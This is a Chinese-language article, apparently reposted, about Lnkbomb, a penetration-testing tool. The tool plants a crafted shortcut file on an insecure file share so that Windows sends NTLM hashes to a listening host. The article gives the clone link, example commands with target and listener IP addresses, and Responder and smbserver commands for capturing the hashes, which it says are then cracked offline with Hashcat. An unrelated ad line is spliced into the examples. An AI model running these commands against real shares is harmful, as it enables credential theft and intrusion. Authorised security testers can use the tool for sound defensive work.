lnkbomb是一款功能强大的安全测试工具,旨在帮助研究人员通过生成安全测试用的快捷方式文件,并尝试从目标文件共享中收集ntlm哈希来评估文件共享的安全性。
工具运行机制
Lnkbomb首先生成一个用于测试的快捷方式文件,并将其上传到目标(不安全)的文件共享中。根据Windows操作系统的运行机制,Windows会寻找与该快捷方式文件相关联的图标文件。这个图标文件可以被定向到运行了Responder或smbserver等工具的安全测试设备上,从而实现NTLMv1或NTLMv2哈希的收集,这取决于目标主机的配置。随后,安全研究人员可以使用Hashcat等工具对收集的哈希进行离线破解。
在整个过程中,研究人员需要在Payload文件中写入目标设备的IP地址,然后通过命令行工具将Payload文件上传到目标文件共享中。
工具安装
Lnkbomb是基于Python 3开发的,因此需要在本地设备上安装并配置好Python 3环境。
接着,研究人员可以通过以下命令将项目源码克隆到本地:
git clone https://www.php.cn/link/f09b521ff0bbb06f43e79df86233e49c.git
请注意,该工具在Windows平台上可以正常运行,但在Linux平台上可能遇到一些问题。
工具使用
打开命令行工具,切换到项目根目录后,运行以下命令可以查看工具的帮助信息:
python3 lnkbomb.py -h
该命令将显示工具的帮助菜单,其中包含各种参数选项。
工具使用样例
样例1:
青柚面试
简单好用的日语面试辅助工具
57 查看详情
python3 lnkbomb.py -t \192.168.1.1Share -a 192.168.1.2
样例2:
python3 lnkbomb.py -r randomfilegenerated.recover
样例3:如果需要使用Responder或smbserver等工具来捕捉NTLM哈希,可以运行以下命令:
responder -I eth0 -dwf -v
或者:
smbserver.py . . -smb2support
使用可执行文件
研究人员也可以从项目的【Releases页面】下载Lnkbomb的已编译可执行文件。所有运行参数选项和命令行工具的使用方法相同,只是运行时通过双击lnkbomb.exe文件来实现,而不是运行“python3 lnkbomb.py”命令。
工具运行截图


许可证协议
本项目的开发与发布遵循MIT开源许可证协议。
项目地址
https://www.php.cn/link/f09b521ff0bbb06f43e79df86233e49c
以上就是如何使用Lnkbomb测试文件共享的安全性的详细内容,更多请关注创想鸟其它相关文章!
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/603547.html
微信扫一扫
支付宝扫一扫